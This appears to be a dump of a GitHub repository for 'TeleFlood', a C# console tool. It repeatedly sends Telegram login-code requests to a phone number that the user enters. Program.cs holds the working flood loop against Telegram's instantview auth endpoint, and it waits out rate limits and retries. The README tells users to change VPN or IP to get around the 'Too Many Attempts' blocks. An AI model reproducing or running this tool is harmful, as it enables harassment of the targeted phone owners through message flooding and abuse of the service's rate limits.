├── Demo.jpg ├── README.md ├── Release └── TeleFlood.exe ├── TeleFlood.sln └── TeleFlood ├── Icon.ico ├── Program.cs ├── Properties └── AssemblyInfo.cs └── TeleFlood.csproj /Demo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleFlood/fdeaaf20d7cfb84991f26a410e4708c857df2f31/Demo.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TeleFlood ? 2 | Telegram Flooder with offical Telegram Account! 3 | 4 | # A Demo ? 5 | 6 | ![alt text](https://github.com/ParsingTeam/TeleFlood/blob/master/Demo.jpg) 7 | 8 | More Information on our telegram channel: @ParsingTeam 9 | 10 | # Too Many Attempts More Then 5 Minute ? 11 | 12 | Using VPN! or restrart your internet modem, your IP must changed! 13 | -------------------------------------------------------------------------------- /Release/TeleFlood.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleFlood/fdeaaf20d7cfb84991f26a410e4708c857df2f31/Release/TeleFlood.exe -------------------------------------------------------------------------------- /TeleFlood.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TeleFlood", "TeleFlood\TeleFlood.csproj", "{430AC341-F45A-46AB-8814-DCE04D7F556B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {430AC341-F45A-46AB-8814-DCE04D7F556B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {430AC341-F45A-46AB-8814-DCE04D7F556B}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {430AC341-F45A-46AB-8814-DCE04D7F556B}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {430AC341-F45A-46AB-8814-DCE04D7F556B}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /TeleFlood/Icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleFlood/fdeaaf20d7cfb84991f26a410e4708c857df2f31/TeleFlood/Icon.ico -------------------------------------------------------------------------------- /TeleFlood/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Net; 5 | using System.Threading; 6 | namespace TeleFlood 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | Console.Title = "Telegram Flooder"; 13 | Console.ForegroundColor = ConsoleColor.White; 14 | string[] Logo = { 15 | "___________ .__ ", 16 | "(__ ___/___ | | ____ ", 17 | " | |_/ __ )| | _/ __ ) ", 18 | " | |( ___/| |_) ___/ ", 19 | " |____| (___ >____/)___ >", 20 | " (/ (/ ", 21 | "___________.__ .___", 22 | "(_ _____/| | ____ ____ __| _/", 23 | " | __) | | / _ ) / _ ) / __ | ", 24 | " | ) | |_( <_> | <_> ) /_/ | ", 25 | " (___ / |____/)____/ (____/)____ | ", 26 | " (/ )/ ", 27 | }; 28 | Console.ForegroundColor = ConsoleColor.Gray; 29 | foreach (var Single in Logo) 30 | { 31 | Console.WriteLine(Single); 32 | } 33 | Console.WriteLine("Developer: Shadow" 34 | + Environment.NewLine 35 | + "Telegram Channel: @ParsingTeam"); 36 | Console.WriteLine(""); 37 | Internet(); 38 | Master: 39 | Console.ForegroundColor = ConsoleColor.White; 40 | string Phone = null; 41 | Console.Write("[*] Enter Phone Number Like This '989030000000': "); 42 | Console.ForegroundColor = ConsoleColor.Magenta; 43 | Phone = Console.ReadLine(); 44 | Console.ForegroundColor = ConsoleColor.White; 45 | if (Phone==null) 46 | { 47 | goto Master; 48 | } 49 | if (Phone.Substring(0,1) =="+") 50 | { 51 | Phone = Phone.Remove(0, 1); 52 | } 53 | if (Phone.Length != 12) 54 | { 55 | Console.ForegroundColor = ConsoleColor.Red; 56 | Console.WriteLine("[!] Bad Number!"); 57 | Console.ForegroundColor = ConsoleColor.White; 58 | goto Master; 59 | } 60 | Console.ForegroundColor = ConsoleColor.Green; 61 | Console.ForegroundColor = ConsoleColor.White; 62 | int OK = 0; 63 | while (true) 64 | { 65 | bool Trace = Flood(Phone); 66 | if (!Trace) 67 | { 68 | OK = 0; 69 | Console.ForegroundColor = ConsoleColor.Yellow; 70 | Console.Write("[-] Too Many Attempts!, Sleep 2 Minutes "); 71 | for (int i = 0; i < 8; i++) 72 | { 73 | Thread.Sleep(1000 * 15); 74 | Console.Write("."); 75 | } 76 | Console.WriteLine(""); 77 | Console.ForegroundColor = ConsoleColor.White; 78 | } 79 | else 80 | { 81 | ++OK; 82 | Console.ForegroundColor = ConsoleColor.Green; 83 | Console.WriteLine("[" + OK + "] " + "Successful Flood."); 84 | Console.ForegroundColor = ConsoleColor.White; 85 | } 86 | 87 | } 88 | 89 | } 90 | static bool Flood(string Phone) 91 | { 92 | string Telegram = "https://instantview.telegram.org/auth/request?phone=%2B"; 93 | using (WebClient Request = new WebClient()) 94 | { 95 | try 96 | { 97 | string Download = Request.DownloadString(Telegram + Phone); 98 | if (Download.Substring(0, 1) == ("{")) { return true; } 99 | else { return false; } 100 | } 101 | catch (Exception) 102 | {return false;} 103 | } 104 | } 105 | static void Internet() 106 | { 107 | using (WebClient Request = new WebClient()) 108 | { 109 | try 110 | { 111 | Console.ForegroundColor = ConsoleColor.White; 112 | Console.Write("[?] Internet Connection:"); 113 | var Data = Request.DownloadString("https://telegram.org/favicon.ico"); 114 | Console.ForegroundColor = ConsoleColor.Green; 115 | Console.Write(" OK"); 116 | Console.WriteLine(""); 117 | Console.ForegroundColor = ConsoleColor.White; 118 | } 119 | catch (Exception) 120 | { 121 | Console.ForegroundColor = ConsoleColor.Red; 122 | Console.Write(" Fail"); 123 | Console.WriteLine(""); 124 | Console.ForegroundColor = ConsoleColor.White; 125 | Console.ReadKey(); 126 | Environment.Exit(0); 127 | } 128 | 129 | } 130 | } 131 | } 132 | } 133 | -------------------------------------------------------------------------------- /TeleFlood/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("TeleFlood")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("Microsoft")] 12 | [assembly: AssemblyProduct("TeleFlood")] 13 | [assembly: AssemblyCopyright("Copyright © Microsoft 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("430ac341-f45a-46ab-8814-dce04d7f556b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /TeleFlood/TeleFlood.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {430AC341-F45A-46AB-8814-DCE04D7F556B} 8 | Exe 9 | Properties 10 | TeleFlood 11 | TeleFlood 12 | v2.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | Icon.ico 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 57 | --------------------------------------------------------------------------------